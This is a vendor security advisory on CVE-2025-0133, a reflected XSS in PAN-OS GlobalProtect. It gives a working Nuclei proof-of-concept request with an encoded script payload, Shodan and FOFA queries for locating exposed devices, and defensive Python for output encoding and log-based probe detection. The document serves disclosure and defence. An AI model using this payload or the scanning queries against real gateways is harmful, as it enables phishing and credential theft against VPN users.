CVE-2025-0133 Published: August 05, 2025

Palo Alto PAN-OS Reflected XSS Vulnerability MEDIUM SEVERITY

A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link. The primary risk is phishing that leads to credential theft, particularly when Clientless VPN is enabled.

Proof of Concept

The vulnerability resides in a parameter exposed by the GlobalProtect or WebGUI endpoint, where user input is not adequately sanitized before being reflected into the HTML response.

Step 1: Trigger the XSS Payload

The reflected XSS is triggered by the HTTP request below, packaged here as a Nuclei template whose matchers check for the unencoded payload in the response:

id: CVE-2025-0133
info:
  name: PAN-OS - Reflected Cross-Site Scripting  
  metadata:
    verified: true
    max-request: 1
    shodan-query:
      - http.favicon.hash:"-631559155"
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
    fofa-query: icon_hash="-631559155"
    product: pan-os
    vendor: paloaltonetworks

http:
  - raw:
      - |
        GET /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>prompt("XSS")</script>'
          - 'authentication cookie'
        condition: and

      - type: status
        status:
          - 200

Step 2: Confirm the Reflection

If the payload appears in the response body unencoded, the target is vulnerable. The request does not require authentication, which makes the issue more impactful on publicly exposed interfaces.
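The check in Step 2 and the root cause in one place, as an added example that is not part of this advisory and not Palo Alto Networks code: the `user` parameter is pulled out of the PoC's request target, dropped into a hypothetical response fragment once verbatim (the flawed behaviour) and once with contextual HTML output encoding (the fix), and each body is tested the way the template's matcher does, by looking for the marker byte-for-byte. The response text and the two `render_*` functions are constructed stand-ins, not PAN-OS output.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request target, taken from the PoC above and cut down to the parameters that matter.
PROBE_TARGET = (
    "/ssl-vpn/getconfig.esp?client-type=1&portal=us-vpn-gw-N"
    "&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E"
    "%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E"
    "&domain=%28empty_domain%29&computer=computer"
)
# The marker the PoC's matcher looks for in the response body.
MARKER = '<script>prompt("XSS")</script>'


def user_param(target: str) -> str:
    """Return the percent-decoded `user` query parameter of a request target ('' if absent)."""
    query = urlsplit(target).query
    return parse_qs(query, keep_blank_values=True).get("user", [""])[0]


def render_vulnerable(user: str) -> str:
    """Hypothetical stand-in for the flawed behaviour: the value is interpolated into HTML verbatim,
    so any markup it contains is parsed by the browser."""
    return f"<p>Invalid authentication cookie for user {user}</p>"


def render_hardened(user: str) -> str:
    """Same fragment with contextual output encoding: <, >, &, and quotes become entities,
    so the browser renders the value as text instead of markup."""
    return f"<p>Invalid authentication cookie for user {html.escape(user, quote=True)}</p>"


def reflected_unencoded(body: str, marker: str = MARKER) -> bool:
    """Step 2's confirmation: True when the marker is present in the body unchanged (not entity-encoded)."""
    return marker in body


if __name__ == "__main__":
    user = user_param(PROBE_TARGET)
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(f"{name}: reflected unencoded = {reflected_unencoded(render(user))}")
```

Encoding at the output point is the fix that matters; rejecting `<` on input is a weaker control, because the same value may later be reflected in an attribute or script context where different characters are dangerous.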

Vulnerable Instance

When the PAN-OS instance is vulnerable, the script will execute in the victim's browser, potentially stealing session tokens or executing administrative actions.
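For defenders who want to know whether anyone has probed a gateway with this request, here is an added example (not part of this advisory) that scans access-log lines for hits on `/ssl-vpn/getconfig.esp` whose `user` parameter decodes to markup. The log lines are constructed in common log format for the demonstration and are not real telemetry; the path set and the markup heuristic are this example's own choices.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in common log format; none of these are real telemetry.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Aug/2025:10:01:02 +0000] "GET /ssl-vpn/getconfig.esp?client-type=1&portal=gw&user=alice&domain=corp HTTP/1.1" 200 512
203.0.113.77 - - [05/Aug/2025:10:02:15 +0000] "GET /ssl-vpn/getconfig.esp?client-type=1&portal=gw&user=%3Csvg%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=corp HTTP/1.1" 200 640
198.51.100.5 - - [05/Aug/2025:10:03:40 +0000] "GET /global-protect/login.esp HTTP/1.1" 200 2048
203.0.113.10 - - [05/Aug/2025:10:04:01 +0000] "GET /ssl-vpn/getconfig.esp?client-type=1&portal=gw&user=o%27neil&domain=corp HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Endpoints whose `user` parameter is reflected (assumed set for this example).
WATCHED_PATHS = {"/ssl-vpn/getconfig.esp"}
# A user name should never contain angle brackets. parse_qs decodes once, so a value that still
# holds %3c/%3e after decoding is double-encoded and is flagged as well.
MARKUP_RE = re.compile(r"[<>]|%3c|%3e", re.IGNORECASE)


def watched_user_param(target: str):
    """Decoded `user` parameter for a watched path, or None when the path is not watched."""
    parts = urlsplit(target)
    if parts.path not in WATCHED_PATHS:
        return None
    return parse_qs(parts.query, keep_blank_values=True).get("user", [""])[0]


def find_reflection_probes(log_text: str) -> list:
    """Return one record per request whose reflected parameter carried markup."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        user = watched_user_param(m["target"])
        if user is None or not MARKUP_RE.search(user):
            continue
        hits.append({"src": m["src"], "ts": m["ts"], "status": int(m["status"]), "user": user})
    return hits


if __name__ == "__main__":
    for hit in find_reflection_probes(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} status={hit['status']} user={hit['user']!r}")
```

A status of 200 on a flagged request only says the gateway answered; whether it reflected the value unencoded is what Step 2 establishes, so pair this log sweep with the version check against the vendor advisory.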

Remediation

Palo Alto has released patches and hotfixes addressing this vulnerability across PAN-OS versions:

All users are advised to upgrade to the latest available version and ensure the web interface is not exposed directly to the internet.

Patch guidance and advisory: https://security.paloaltonetworks.com/CVE-2025-0133

Closing Words

Our team at Zerosek continues to monitor emerging threats and respond with detection tools, coordinated disclosures, and remediation guidance. As part of our commitment to securing the external attack surface, we rapidly track CVEs like CVE-2025-0133 and provide clients with immediate actionable insights.